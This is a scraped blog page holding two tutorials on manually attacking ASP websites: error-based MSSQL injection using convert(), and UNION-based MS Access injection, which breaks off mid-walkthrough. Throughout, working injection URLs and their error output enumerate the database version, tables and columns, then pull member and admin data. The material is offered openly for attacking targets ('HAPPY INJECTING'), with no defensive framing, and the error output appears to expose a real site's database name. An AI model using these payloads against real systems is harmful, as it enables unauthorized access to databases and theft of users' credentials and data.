<span style="font-size: small;"><b>AUTHOR:Rai Muzammal Hussain a.k.a RAi Jee </b></span>Anonymoushttp://www.blogger.com/profile/02693784085431897325noreply@blogger.com3tag:blogger.com,1999:blog-5545325473666478334.post-15957985315796082892015-07-21T08:17:00.001-07:002015-08-17T09:07:10.573-07:00MSSQL Injection Using Convert<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWkSwZnt0fZYwU62YAHSLTmkRZZd_jP-qA7AT5SEKS319azb_G_lNIcBfMmQMrdF6uuf4pLSpGNmOJzAUWNKIXqSKKvG90xcruiLSgz8Z_WqchDDNu5ySGRlDG2C3pZF4xft9KVihzy84I/s1600/MSSQL+Injection+Using+Convert+Tutorial+www.raijee1337.blogspot.com+1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="MSSQL Injection Using Convert" border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWkSwZnt0fZYwU62YAHSLTmkRZZd_jP-qA7AT5SEKS319azb_G_lNIcBfMmQMrdF6uuf4pLSpGNmOJzAUWNKIXqSKKvG90xcruiLSgz8Z_WqchDDNu5ySGRlDG2C3pZF4xft9KVihzy84I/s320/MSSQL+Injection+Using+Convert+Tutorial+www.raijee1337.blogspot.com+1.png" title="MSSQL Injection Using Convert" width="269" /></a></span></div>
<span style="font-size: small;">In our Previous Tutorial we Have Discuss About <a href="http://raijee1337.blogspot.com/2015/07/mssql-union-based-injection-step-by.html" target="_blank">MSSQL Union Based Injection</a></span><br />
<span style="font-size: small;">Now Let's Come To the Next Part. In this Tutorial You Will Learn About Injecting Site with Convert Attack.</span><br />
<span style="font-size: small;">How Actually This Command Work.This command works between two Data types and we have to give Commands to the Server with Convert then it will give That Specific Data which we have execute in the Command.</span><br />
<a name='more'></a><span style="font-size: small;"><br /></span>
<span style="font-size: small;">So let's start our injection Manually .</span><br />
<span style="font-size: small;">we got A target and let's Check if it's Vulnerable for injecting.So we will Execute the URL by Adding Single Quote " ' "at the End If the Target Parameter.</span><br />
<span style="font-size: small;"><b>http://www.Vuln-Site.com/authorprofile.asp?id=46'</b></span><br />
<span style="font-size: small;">It Gives us Error</span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-WZq8DBTnSMwRufFd0fAaXkhyphenhyphenJgwVOABxb9zYJGjjvQVWX_fDUMbjrOHLNsTRMAMxf4_iwKDjQ6pqvS2nw2J0MV8IIZ0l_dCXXORvd8gw0Wb9yNwBddQ-SH6dnPpBQcmAR_dwfzLfV8xg/s1600/MSSQL+Injection+Using+Convert+Tutorial+1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="MSSQL Injection Using Convert" border="0" height="127" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-WZq8DBTnSMwRufFd0fAaXkhyphenhyphenJgwVOABxb9zYJGjjvQVWX_fDUMbjrOHLNsTRMAMxf4_iwKDjQ6pqvS2nw2J0MV8IIZ0l_dCXXORvd8gw0Wb9yNwBddQ-SH6dnPpBQcmAR_dwfzLfV8xg/s400/MSSQL+Injection+Using+Convert+Tutorial+1.png" title="MSSQL Injection Using Convert" width="400" /></a></span></div>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>ERROR:</b></span><br />
<span style="font-size: small;"><b><span style="font-family: Arial;">Microsoft OLE DB Provider for ODBC Drivers</span> <span style="font-family: Arial;">error '80040e14'</span></b></span>
<br />
<span style="font-size: small;"><b><span style="font-family: Arial;">[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark after the character string ''.</span></b></span>
<br />
<span style="font-size: small;"><b>
<span style="font-family: Arial;">/authorprofile.asp</span><span style="font-family: Arial;">, line 10</span></b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-family: Arial; font-size: small;">Our Target site is Vulnerable.As we Are Injecting with Convert Attack So we no need to Go For Counting the Total number Of Columns. We will Directly Execute our Commands with Convert.</span><br />
<span style="font-family: Arial; font-size: small;">Let's Check The Version.</span><br />
<span style="font-size: small;"><b>http://www.Vuln-Site.com/authorprofile.asp?id=46 and 1=convert(int,@@version)--</b></span> <br />
<span style="font-size: small;">After Executing the Query We Got The Version.</span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9v4-ENYj-dSIcGeuZ8DE2XjpRA1rusMrwP9JEa9aspu1X0G5uaxla9iztBhVdODDG6IU-ZReJejuoup1rkPto4P-qiBOn8-siCJX3oFG1IReZuDcHHrAupM2dZGjNDa3tLosUwPwzqZ_w/s1600/MSSQL+Injection+Using+Convert+Tutorial+2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="MSSQL Injection Using Convert" border="0" height="152" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9v4-ENYj-dSIcGeuZ8DE2XjpRA1rusMrwP9JEa9aspu1X0G5uaxla9iztBhVdODDG6IU-ZReJejuoup1rkPto4P-qiBOn8-siCJX3oFG1IReZuDcHHrAupM2dZGjNDa3tLosUwPwzqZ_w/s400/MSSQL+Injection+Using+Convert+Tutorial+2.png" title="MSSQL Injection Using Convert" width="400" /></a></span></div>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>Here is Version:</b><span style="font-family: Arial;"><span style="color: red;">Microsoft
SQL Server 2012 - 11.0.5582.0 (X64)
Feb 27 2015 18:10:15
Copyright (c) Microsoft Corporation
Web Edition (64-bit) on Windows NT 6.1 <X64> (Build 7601: Service
Pack 1)</span></span></span><br />
<span style="font-family: Arial; font-size: small;">Microsoft OLE DB Provider for ODBC Drivers</span><span style="font-size: small;"> <span style="font-family: Arial;">error '80040e07'</span></span>
<br />
<span style="font-family: Arial; font-size: small;">[Microsoft][ODBC SQL Server Driver][SQL
Server]Conversion failed when converting the nvarchar value '<span style="color: red;">Microsoft
SQL Server 2012 - 11.0.5582.0 (X64)
Feb 27 2015 18:10:15
Copyright (c) Microsoft Corporation
Web Edition (64-bit) on Windows NT 6.1 <X64> (Build 7601: Service
Pack 1)</span>
' to data type int.</span>
<br />
<span style="font-family: Arial; font-size: small;">/authorprofile.asp</span><span style="font-family: Arial; font-size: small;">, line 10</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-family: Arial; font-size: small;">Now Let's check The Current Database name. </span><br />
<span style="font-size: small;"><b>http://www.Vuln-Site.com/authorprofile.asp?id=46 and 1=convert(int,db_name())--</b></span><br />
<span style="font-size: small;">And we Have got The Current Database Name.<b> </b></span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjx67JDVYd99fJpUXbDxF3cSNrUkVehO9UZtoJj4WtBJ1r-eLTJ9b9B1lqIETLaUl5ucWWWX870Jgf6tGz00HESCGp9Z7RcvlFqAFImyyz4FSRb1dPtveFbc08RDuHrJIwY4PYED1g2SVgi/s1600/MSSQL+Injection+Using+Convert+Tutorial+3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="MSSQL Injection Using Convert" border="0" height="142" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjx67JDVYd99fJpUXbDxF3cSNrUkVehO9UZtoJj4WtBJ1r-eLTJ9b9B1lqIETLaUl5ucWWWX870Jgf6tGz00HESCGp9Z7RcvlFqAFImyyz4FSRb1dPtveFbc08RDuHrJIwY4PYED1g2SVgi/s400/MSSQL+Injection+Using+Convert+Tutorial+3.png" title="MSSQL Injection Using Convert" width="400" /></a></span></div>
<span style="font-size: small;"><b><br /></b></span>
<span style="font-size: small;"><b>This is Current Database Name:</b><b><span style="font-family: Arial;"><span style="color: red;">museindia</span></span></b></span><br />
<span style="font-size: small;"><b><span style="font-family: Arial;">Microsoft OLE DB Provider for ODBC Drivers</span> <span style="font-family: Arial;">error '80040e07'</span></b></span>
<br />
<span style="font-size: small;"><b><span style="font-family: Arial;">[Microsoft][ODBC SQL Server Driver][SQL
Server]Conversion failed when converting the nvarchar value '<span style="color: red;">museindia</span>'
to data type int.</span></b></span>
<br />
<span style="font-size: small;"><b>
<span style="font-family: Arial;">/authorprofile.asp</span><span style="font-family: Arial;">, line 10</span></b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">As we have get the Version and The Database name. Now Let's move to Getting The Tables.</span><br />
<span style="font-size: small;">This is Our Query for getting the Tables.</span><br />
<!-- adsense -->
<span style="font-size: small;"><b>http://www.Vuln-Site.com/authorprofile.asp?id=46 and 1=convert(int,(select top 1 table_name from information_schema.tables))--+</b></span><br />
<span style="font-size: small;">After Executing the Query we have Got The First Table Name<b>.</b></span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiOj-DoIovUdwuL_UGhCvzKRIv5351vuDCtGkfYTQuBNwXWhPpdL2ai5xdmOx_DHIW90UKS_Ebop5G2AkGmMBzzZ_mNla-q3fXQlEeT_4juKe4UAmPmkB8ThR_wx9QOqWN5f_AKzkrYtVed/s1600/MSSQL+Injection+Using+Convert+Tutorial+4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="MSSQL Injection Using Convert" border="0" height="135" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiOj-DoIovUdwuL_UGhCvzKRIv5351vuDCtGkfYTQuBNwXWhPpdL2ai5xdmOx_DHIW90UKS_Ebop5G2AkGmMBzzZ_mNla-q3fXQlEeT_4juKe4UAmPmkB8ThR_wx9QOqWN5f_AKzkrYtVed/s400/MSSQL+Injection+Using+Convert+Tutorial+4.png" title="MSSQL Injection Using Convert" width="400" /></a></span></div>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>Table name:<span style="color: red;">about</span></b></span><br />
<span style="font-size: small;"><b><span style="font-family: Arial;">Microsoft OLE DB Provider for ODBC Drivers</span> <span style="font-family: Arial;">error '80040e07'</span></b></span>
<br />
<span style="font-size: small;"><b><span style="font-family: Arial;">[Microsoft][ODBC SQL Server Driver][SQL Server]Conversion failed when converting the nvarchar value '<span style="color: red;">about</span>' to data type int.</span></b></span>
<br />
<span style="font-size: small;"><b>
<span style="font-family: Arial;">/authorprofile.asp</span><span style="font-family: Arial;">, line 10</span></b></span><br />
<span style="font-family: Arial; font-size: small;">For Getting the Other Tables from the Database we will add our Previous Table name Enclosed By Single Quotes with in Small Brackets.</span><br />
<span style="font-size: small;"><b><span style="font-family: Arial;">For Example:</span></b></span><br />
<span style="font-size: small;"><b>and 1=convert(int,(select top 1 table_name from information_schema.tables <span style="color: red;">where table_name not in ('<span style="color: orange;">OUR_PREVIOUS_TABLE_NAME_1</span>','<span style="color: orange;">OUR_PREVIOUS_TABLE_NAME_2</span>')</span>))--+</b></span><br />
<span style="font-size: small;">So Let's Check The Other Tables from the Database.</span><br />
<span style="font-size: small;"><b>http://www.Vuln-Site.com/authorprofile.asp?id=46 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('about')))--+</b></span><br />
<span style="font-size: small;">And We Have got The Next Table Name <b>.</b></span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhg1nr7W_fYzhXmpW_uO05xdYEizO50dBTMaz153vUGR4Mpgnndeop4yPKG-YCZCcTRmpZ_RLhoTPYtzJyak7ZU58Lir54J2Mhktb0QZDeArvHt903Qc5LZF9JVm63eiTFxZfsCtQSNK7DC/s1600/MSSQL+Injection+Using+Convert+Tutorial+5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="MSSQL Injection Using Convert" border="0" height="103" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhg1nr7W_fYzhXmpW_uO05xdYEizO50dBTMaz153vUGR4Mpgnndeop4yPKG-YCZCcTRmpZ_RLhoTPYtzJyak7ZU58Lir54J2Mhktb0QZDeArvHt903Qc5LZF9JVm63eiTFxZfsCtQSNK7DC/s400/MSSQL+Injection+Using+Convert+Tutorial+5.png" title="MSSQL Injection Using Convert" width="400" /></a></span></div>
<span style="font-size: small;"><b><br /><br />Next Table Name:<span style="color: red;">aucon</span></b></span><br />
<span style="font-size: small;"><b><span style="font-family: Arial;">Microsoft OLE DB Provider for ODBC Drivers</span> <span style="font-family: Arial;">error '80040e07'</span></b></span>
<br />
<span style="font-size: small;"><b><span style="font-family: Arial;">[Microsoft][ODBC SQL Server Driver][SQL Server]Conversion failed when converting the nvarchar value '<span style="color: red;">aucon</span>' to data type int.</span></b></span>
<br />
<span style="font-size: small;"><b>
<span style="font-family: Arial;">/authorprofile.asp</span><span style="font-family: Arial;">, line 10</span></b></span><br />
<span style="font-size: small;"><b><span style="font-family: Arial;">In this Way we will Continue to Getting Other tables until get Required Table.</span></b></span><br />
<span style="font-family: Arial; font-size: small;"><b>Here we Got The Table name:</b></span><span style="font-size: small;"> <span style="color: red;">members</span></span><br />
<span style="font-size: small;">Now let's Get the Column names from this Table.</span><br />
<span style="font-size: small;"><b>http://www.Vuln-Site.com/authorprofile.asp?id=46 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='members'))--+</b></span><br />
<span style="font-size: small;">we have got the First Column name.</span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgj5-QKu-GOd2YgykaEisQng_LHMT_cSYG_OcnMcMOTe8mplBSV3n75kG8uUGhyp6oXSJl-yA_0NmfHyqB0YPLlnYtPJz9eAkArW1EwaXZRBBQWH6xOT2beDBZCm_2eBvlufkS-UHBreNyo/s1600/MSSQL+Injection+Using+Convert+Tutorial+6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="MSSQL Injection Using Convert" border="0" height="121" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgj5-QKu-GOd2YgykaEisQng_LHMT_cSYG_OcnMcMOTe8mplBSV3n75kG8uUGhyp6oXSJl-yA_0NmfHyqB0YPLlnYtPJz9eAkArW1EwaXZRBBQWH6xOT2beDBZCm_2eBvlufkS-UHBreNyo/s400/MSSQL+Injection+Using+Convert+Tutorial+6.png" title="MSSQL Injection Using Convert" width="400" /></a></span></div>
<span style="font-size: small;"><b> </b></span><br />
<span style="font-size: small;"><b> This is the First Column Name:<span style="color: red;">memberid</span></b></span><br />
<span style="font-size: small;"><b> Let's try to get the other Columns as we do the same for getting the other tables from the database.</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.Vuln-Site.com/authorprofile.asp?id=46 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='members' and column_name not in ('memberid')))--+</b></span><br />
<span style="font-size: small;">So After Getting the Column name The Final Part is To Extracting Data from The Columns.<b> </b></span><br />
<span style="font-size: small;"><b>This will be Our Final Query !</b></span><br />
<span style="font-size: small;"><b><b>http://www.Vuln-Site.com/authorprofile.asp?id=46 a</b>nd 1=convert(int,(select top 1 <span style="color: red;">OUR_COLUMN_NAME _HERE</span> from <span style="color: orange;">OUR_TABLE_NAME_HERE</span>))--+</b></span><br />
<span style="font-size: small;">This query will Print the Data from the Columns on the WebPage.</span><br />
<span style="color: purple; font-size: small;">HAP</span><span style="color: #990000; font-size: small;">PY</span><span style="font-size: small;"> <span style="color: #bf9000;">INJE</span><span style="color: #4c1130;">CTING</span> <span style="color: #76a5af;">!! </span></span><br />
<span style="font-size: small;"><b>AUTHOR:Rai Muzammal Hussain a.k.a RAi Jee</b></span><br />
<span style="font-size: small;"><br /></span>Anonymoushttp://www.blogger.com/profile/02693784085431897325noreply@blogger.com3tag:blogger.com,1999:blog-5545325473666478334.post-90204564621737891492015-07-20T07:38:00.001-07:002015-08-17T09:00:29.727-07:00MS-Access Injection -Tutorial<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFSobJ_pRfealwLO5h4oCccGwziDO9_ETzIb90EcR6R-bna5nqpYIRIuNAfphabqITWDsppHSreN8GnMzfKlFbVt5KnRj2KS1tnuMCxkeXRj4gMcAgiE-wWhl2Ru_Sip0t_HwWzvqxZZiP/s1600/MS-Acces+Injection+-+www.raijee1337.blogspot.com+Tutorials.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="MS-Access Injection -Tutorial" border="0" height="174" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFSobJ_pRfealwLO5h4oCccGwziDO9_ETzIb90EcR6R-bna5nqpYIRIuNAfphabqITWDsppHSreN8GnMzfKlFbVt5KnRj2KS1tnuMCxkeXRj4gMcAgiE-wWhl2Ru_Sip0t_HwWzvqxZZiP/s320/MS-Acces+Injection+-+www.raijee1337.blogspot.com+Tutorials.png" title="MS-Access Injection -Tutorial" width="320" /></a></div>
In this Tutorial You Will learn How to inject into MS Access Database.<br />
So we will start Our Injecting Manually.First we have to check if Our Target site is Vulnerable .So we will use Regular injecting Type and add Single Quote ' at the end of the Parameter.<br />
<a name='more'></a><br />
and Execute the URL <br />
<br />
<b>http://www.Vuln-Site.com/dettaglio-news.asp?ID=341'</b><br />
Here we got The ERROR ! !<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrPoiPMDA5E2bJ1sn0XhCyKJuOP3QbDmWv6KS8mlHmaew2ENRnRIXIxeBlSm4fccijpOpIqE8HJooZDZDA1N5rYtBUfauqjM4Lk823sG8uSeuILRuzp3MDI98UHsGXK1JxUqfAYUl-dfHH/s1600/MS-Acces+Injection+-Tutorial+1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="MS-Access Injection -Tutorial" border="0" height="205" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrPoiPMDA5E2bJ1sn0XhCyKJuOP3QbDmWv6KS8mlHmaew2ENRnRIXIxeBlSm4fccijpOpIqE8HJooZDZDA1N5rYtBUfauqjM4Lk823sG8uSeuILRuzp3MDI98UHsGXK1JxUqfAYUl-dfHH/s400/MS-Acces+Injection+-Tutorial+1.png" title="MS-Access Injection -Tutorial" width="400" /></a></div>
ERROR:<br />
<span style="font-size: small;"><b><span style="font-family: Arial;">Microsoft JET Database Engine</span> <span style="font-family: Arial;">error '80040e14'</span></b></span>
<br />
<span style="font-size: small;"><b><span style="font-family: Arial;">Syntax error in string in query expression 'ID =341''.</span></b></span>
<br />
<span style="font-size: small;"><b>
<span style="font-family: Arial;">/dettaglio-news.asp</span><span style="font-family: Arial;">, line 91</span></b></span><br />
<span style="font-family: Arial; font-size: small;">So Our Target is Vulnerable.Before Starting Other Process first we have To balance our query.We will use Different Comments for balancing Our Query.</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.Vuln-Site.com/dettaglio-news.asp?ID=341--+ Error !</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b><span style="font-family: Arial;">ERROR:</span><span style="font-family: Arial;">Syntax error (missing operator) in query expression 'ID =341--'.</span></b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.Vuln-Site.com/dettaglio-news.asp?ID=341-- Again Error !!</b></span><br />
<br />
<span style="font-size: small;">Now Let's Check the null-byte <b>" ;% 00 "</b></span><br />
<span style="font-size: small;"><b>http://www.Vuln-Site.com/dettaglio-news.asp?ID=341</b><b><b>;</b></b></span><span style="font-size: small;"><b><span style="font-size: small;"><b>% 00</b></span> Error Gone!!</b></span><br />
<span style="font-size: small;">so will continue our Injecting With using Null-Byte at the end of the Parameter.</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-family: Arial; font-size: small;">Now we have to Count the Total number of Columns </span><span style="font-family: Arial; font-size: small;">.So For This Purpose we will use Normally ORDER BY command.</span><br />
<span style="font-family: Arial; font-size: small;">Let's Check Total Number of Columns:</span><br />
<span style="font-size: small;"><b>http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 order by 1</b><b>;</b></span><span style="font-size: small;"><b>% 00</b></span><br />
<span style="font-size: small;"><b>No Error. Page Loaded Normally !</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 order by 5</b><b>;</b></span><span style="font-size: small;"><b>% 00</b></span><br />
<span style="font-size: small;"><b>Again No Error !</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 order by 8;</b></span><span style="font-size: small;"><b>% 00</b></span><br />
<span style="font-size: small;"><b>Again page Loaded Normally !</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">but at order by 9 we have got the ERROR !<b> </b></span><br />
<span style="font-size: small;"><b>http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 order by 9;</b></span><span style="font-size: small;"><b>% 00</b></span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNWlaIkvtXvMCF4bY_n58Hl78teTidamtoruIauw3b6R3GanSsh5NhnmL37EfircdnHMkmvq-amgw-qp4CmBv-LkyQQw84O3iqz7UL-MWpkzOL-E8rRoKyXuRRQcSs7n3DZpvQpu9FiGXD/s1600/MS-Acces+Injection+-Tutorial+2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="MS-Access Injection -Tutorial" border="0" height="158" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNWlaIkvtXvMCF4bY_n58Hl78teTidamtoruIauw3b6R3GanSsh5NhnmL37EfircdnHMkmvq-amgw-qp4CmBv-LkyQQw84O3iqz7UL-MWpkzOL-E8rRoKyXuRRQcSs7n3DZpvQpu9FiGXD/s400/MS-Acces+Injection+-Tutorial+2.png" title="MS-Access Injection -Tutorial" width="400" /></a></span></div>
<span style="font-size: small;"><b>ERROR:</b></span><br />
<span style="font-size: small;"><b><span style="font-family: Arial;">Microsoft JET Database Engine</span> <span style="font-family: Arial;">error '80040e14'</span></b></span>
<br />
<span style="color: red; font-size: small;"><b><span style="font-family: Arial;">The Microsoft Jet database engine does not recognize '9' as a valid field name or expression.</span></b></span>
<br />
<span style="font-size: small;"><b>
<span style="font-family: Arial;">/dettaglio-news.asp</span><span style="font-family: Arial;">, line 91</span></b></span><br />
<span style="font-family: Arial; font-size: small;">So There are 8 Columns .</span><br />
<span style="font-family: Arial; font-size: small;">Now Let's Prepare our <b>UNION BASED</b> command.</span><br />
<span style="font-family: Arial; font-size: small;">After Executing The <b>UNION BASED</b> query We have Got ERROR: </span><br />
<span style="font-size: small;"><b>http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 Union Select 1,2,3,4,5,6,7,8;</b></span><span style="font-size: small;"><b>% 00</b></span><br />
<span style="font-size: small;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><b><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4Nm-UqZrhAtgot1L9NcuPU8zhg9HyxmC8pVOHp0WTjdsH0Psz2fyU-h9V1jGsLcZZtyEVetGa53yfxvCxcvcgEClHn12E4gr98vqHQ0nRlC_VCAAYIYQ8FD-Lj9cDHy2BXGp1t7pGbdZe/s1600/MS-Acces+Injection+-Tutorial+3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="MS-Access Injection -Tutorial" border="0" height="190" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4Nm-UqZrhAtgot1L9NcuPU8zhg9HyxmC8pVOHp0WTjdsH0Psz2fyU-h9V1jGsLcZZtyEVetGa53yfxvCxcvcgEClHn12E4gr98vqHQ0nRlC_VCAAYIYQ8FD-Lj9cDHy2BXGp1t7pGbdZe/s400/MS-Acces+Injection+-Tutorial+3.png" title="MS-Access Injection -Tutorial" width="400" /></a></b></span></div>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b> ERROR:</b></span><br />
<span style="font-size: small;"><b><span style="font-family: Arial;">Microsoft JET Database Engine</span> <span style="font-family: Arial;">error '80004005'</span></b></span>
<br />
<span style="color: red; font-size: small;"><b><span style="font-family: Arial;">Query input must contain at least one table or query.</span></b></span>
<br />
<span style="font-size: small;"><b>
<span style="font-family: Arial;">/dettaglio-news.asp</span><span style="font-family: Arial;">, line 91</span></b></span><br />
<span style="font-family: Arial; font-size: small;">Here Comes The Main part.As our columns count is correct.so it seems to be Database is mysql 4. </span><br />
<span style="font-family: Arial; font-size: small;">Now we Have to Guess the Tables and Columns.So First we will Guess the Tables.</span><br />
<!-- adsense -->
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 Union Select 1,2,3,4,5,6,7,8 from Login;</b></span><span style="font-size: small;"><b>% 00</b></span><br />
<span style="font-size: small;"><b>it gives us ERROR!</b></span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj22sac2Hw0cYZWVtTwzThs9hwK9BonpmeVUz61YNG0X60li08kx3uTE74JXn_8wH9h1IzEsYyWmj33wa9ha6iX3O8BRARg3zbDj62MDfunEdNAt5nZsJedfGtl1ekoOAjbpg07n80ueetR/s1600/MS-Acces+Injection+-Tutorial+4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="MS-Access Injection -Tutorial" border="0" height="153" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj22sac2Hw0cYZWVtTwzThs9hwK9BonpmeVUz61YNG0X60li08kx3uTE74JXn_8wH9h1IzEsYyWmj33wa9ha6iX3O8BRARg3zbDj62MDfunEdNAt5nZsJedfGtl1ekoOAjbpg07n80ueetR/s400/MS-Acces+Injection+-Tutorial+4.png" title="MS-Access Injection -Tutorial" width="400" /></a></span></div>
<span style="font-size: small;"><b> ERROR:</b></span><br />
<span style="font-size: small;"><b><span style="font-family: Arial;">Microsoft JET Database Engine</span> <span style="font-family: Arial;">error '80040e37'</span></b></span>
<br />
<span style="font-size: small;"><b><span style="font-family: Arial;"><span style="color: red;">The Microsoft Jet database engine cannot
find the input table or query 'login'. Make sure it exists and that its
name is spelled correctly.</span></span></b></span>
<br />
<span style="font-size: small;"><b>
<span style="font-family: Arial;">/dettaglio-news.asp</span><span style="font-family: Arial;">, line 91</span></b></span><br />
<span style="font-family: Arial; font-size: small;">it Mean this table is not Exist.Let's Try another</span><span style="font-family: Arial; font-size: small;"><b>.</b></span><br />
<span style="font-size: small;"><b>http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 Union Select 1,2,3,4,5,6,7,8 from tabladmin;</b></span><span style="font-size: small;"><b>% 00</b></span><br />
<span style="font-size: small;"><b>Still The Same ERROR!!</b></span><br />
<span style="font-size: small;">But when we try Table <b>ADMIN</b> the Error is Gone.</span><br />
<span style="font-size: small;"><b>http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 Union Select 1,2,3,4,5,6,7,8 from admin;</b></span><span style="font-size: small;"><b>% 00</b></span><br />
<span style="font-size: small;">At the Table <b>ADMIN </b>the Error is gone and we can see the Vulnerable Columns on the Web Page .</span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiv1qZUczUqCnqmYiebD1zs2dfGvHueKV854pTdMn3oM_OYxeJk8Kye445x2B8vKdWbNrRfB0_lVrch28hWekWGsdhMp_AVDmPcXg8OtQ3u97JhVGwuVF3ZDQVo498AdbdlDCwKOXIxTkU-/s1600/MS-Acces+Injection+-Tutorial+6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="MS-Access Injection -Tutorial" border="0" height="208" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiv1qZUczUqCnqmYiebD1zs2dfGvHueKV854pTdMn3oM_OYxeJk8Kye445x2B8vKdWbNrRfB0_lVrch28hWekWGsdhMp_AVDmPcXg8OtQ3u97JhVGwuVF3ZDQVo498AdbdlDCwKOXIxTkU-/s400/MS-Acces+Injection+-Tutorial+6.png" title="MS-Access Injection -Tutorial" width="400" /></a></span></div>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">You can see the 2,3,6 are the Vulnerable Columns.so now we have to Guess The Columns.We will put our columns in these Vulnerable Columns.</span><br />
<span style="font-size: small;"><b>http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 Union Select 1,2,admin_id,4,5,6,7,8 from admin;</b></span><span style="font-size: small;"><b>% 00</b></span><br />
<span style="font-size: small;"><b>It Gives us Error !</b></span><br />
<span style="font-size: small;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
